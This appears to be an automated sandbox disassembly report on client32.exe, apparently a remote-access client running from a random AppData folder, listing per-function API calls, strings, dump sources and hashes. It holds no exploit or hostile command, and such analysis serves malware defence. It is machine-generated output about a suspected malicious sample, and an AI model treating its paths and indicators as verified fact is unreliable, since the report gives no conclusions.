                                                                                                                                                                • Instruction Fuzzy Hash: 9C01B1B990521D66CB109BB0AC41FEAF77C9B1470DF100199EC1996940EE21BA548BA4
                                                                                                                                                                Function 11143230 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,76968400,?), ref: 111432C7
                                                                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFile$CloseHandle
                                                                                                                                                                • String ID: "
                                                                                                                                                                • API String ID: 1443461169-123907689
                                                                                                                                                                • Opcode ID: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                                                                                                • Instruction ID: 150de81b6b92e27c68bcdd2e608667d56283c35638c5ea37a79585d4ca6bceb2
                                                                                                                                                                • Opcode Fuzzy Hash: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                                                                                                • Instruction Fuzzy Hash: 38217C30A1C269AFE3128E78DD54FD9BBA49F45B14F3041E0E4999B1C1DBB1A948C750
                                                                                                                                                                Function 1102D0D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,59FD48C0,75732EE0,?,00000000,1118083B,000000FF,?,110300D6,UseIPC,00000001,00000000), ref: 1102D187
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                  • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,776CC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D14A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                                                                                                • String ID: Client$DisableGeolocation
                                                                                                                                                                • API String ID: 3315423714-4166767992
                                                                                                                                                                • Opcode ID: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                                                                                                • Instruction ID: 1755caac6fc2658334c1ed2ebc8622a08952aff54e10c128aab6c20125b970ec
                                                                                                                                                                • Opcode Fuzzy Hash: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                                                                                                • Instruction Fuzzy Hash: 8521E474A40315BBE712CFA8CD42B6EF7A4E708B18F500269F921AB3C0D7B5B8008785
                                                                                                                                                                Function 110271B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110271DA
                                                                                                                                                                  • Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,76963760,00000000,7697A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
                                                                                                                                                                  • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
                                                                                                                                                                  • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
                                                                                                                                                                  • Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
                                                                                                                                                                • TranslateMessage.USER32(?), ref: 110271F0
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 110271F6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                                                                                                • String ID: Exit Msgloop, quit=%d
                                                                                                                                                                • API String ID: 3212272093-2210386016
                                                                                                                                                                • Opcode ID: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                                                                                                • Instruction ID: 083e85bce0718499e1b375aadfda5de5654481b636091be3423b85693ac47093
                                                                                                                                                                • Opcode Fuzzy Hash: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                                                                                                • Instruction Fuzzy Hash: 3D01D876E0521D66EB15DAE99C82F6FF3BD6B64718FD00065EE1092185F760F404CBA1
                                                                                                                                                                Function 110173F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 110173FD
                                                                                                                                                                  • Part of subcall function 11017300: WaitForSingleObject.KERNEL32(000002D8,000000FF), ref: 1101733C
                                                                                                                                                                  • Part of subcall function 11017300: CoInitialize.OLE32(00000000), ref: 11017345
                                                                                                                                                                  • Part of subcall function 11017300: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                                                                                                  • Part of subcall function 11017300: CoUninitialize.COMBASE ref: 110173D0
                                                                                                                                                                  • Part of subcall function 11017220: WaitForSingleObject.KERNEL32(000002D8,000000FF), ref: 11017252
                                                                                                                                                                  • Part of subcall function 11017220: CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                                                                                                  • Part of subcall function 11017220: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                                                                                                  • Part of subcall function 11017220: CoUninitialize.COMBASE ref: 110172E0
                                                                                                                                                                • SetEvent.KERNEL32(000002D8), ref: 1101741D
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11017423
                                                                                                                                                                Strings
                                                                                                                                                                • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101742D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                                                                                                • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                                                                                                • API String ID: 3804766296-4122679463
                                                                                                                                                                • Opcode ID: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                                                                                                • Instruction ID: c54e938b4ab1921e6220328725fe5e45cb955b1045b44cf9de438437e8313787
                                                                                                                                                                • Opcode Fuzzy Hash: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                                                                                                • Instruction Fuzzy Hash: 47F0A0B6E1011C6BE700DBF9AC8AE6BBB9CDB4471CB100026F910C7245E9A6BC1087A1
                                                                                                                                                                Function 111377F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00001000,Function_00137630,00000000,00000000,11138782), ref: 1113782E
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,11138782,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11137835
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateHandleThread__wcstoi64
                                                                                                                                                                • String ID: *AutoICFConfig$Client
                                                                                                                                                                • API String ID: 3257255551-59951473
                                                                                                                                                                • Opcode ID: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                                                                                                • Instruction ID: 9aee7181833ba8711af7cecc10eced9f2f0784297ad8accf53734ae3fbf9e9e1
                                                                                                                                                                • Opcode Fuzzy Hash: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                                                                                                • Instruction Fuzzy Hash: 98E0D8757A062D7AF6149AE98C86F65F6199744B26F500154FA20A50C4D6A0A440CB64
                                                                                                                                                                Function 11070C60 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(000000FA), ref: 11070CB7
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 11070CC4
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 11070D96
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$EnterLeaveSleep
                                                                                                                                                                • String ID: Push
                                                                                                                                                                • API String ID: 1566154052-4278761818
                                                                                                                                                                • Opcode ID: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                                                                                                • Instruction ID: e8f6e055aac827a13dfabc2dec6ad808bd843e21556e42594c7620890779e76f
                                                                                                                                                                • Opcode Fuzzy Hash: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                                                                                                • Instruction Fuzzy Hash: 1B51CC78E04784DFE721DF64C880B8AFBE0EF09318F1546A9D8998B285D770BC84CB91
                                                                                                                                                                Function 110306E7 Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1314093303-0
                                                                                                                                                                • Opcode ID: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                                                                                                • Instruction ID: 8e76f7fb4e107f93cb89770177b2081f40004907d07b5dfd0c3c9c847909df3d
                                                                                                                                                                • Opcode Fuzzy Hash: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                                                                                                • Instruction Fuzzy Hash: A7F08135E1425ADFE714DF60D889BADF774FB88319F0002A9D82A52180DF355940CB50
                                                                                                                                                                Function 11143C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\bpsFyf\client32.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CurrentFileModuleNameProcess
                                                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe
                                                                                                                                                                • API String ID: 2251294070-2235949226
                                                                                                                                                                • Opcode ID: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                                                                                                • Instruction ID: b9aa28b4973dc8f7500fb142756b1fa860f28402029a3e5f5efe4e67c4e883a6
                                                                                                                                                                • Opcode Fuzzy Hash: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                                                                                                • Instruction Fuzzy Hash: F811E7747282235BE7149F76C994719F7A5AB40B5DF20403EE819C76C4DB71F845C744
                                                                                                                                                                Function 1110F4A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _malloc.LIBCMT ref: 1110F4A9
                                                                                                                                                                  • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                                                                                  • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                                                                                  • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                                                                                • _memset.LIBCMT ref: 1110F4D2
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
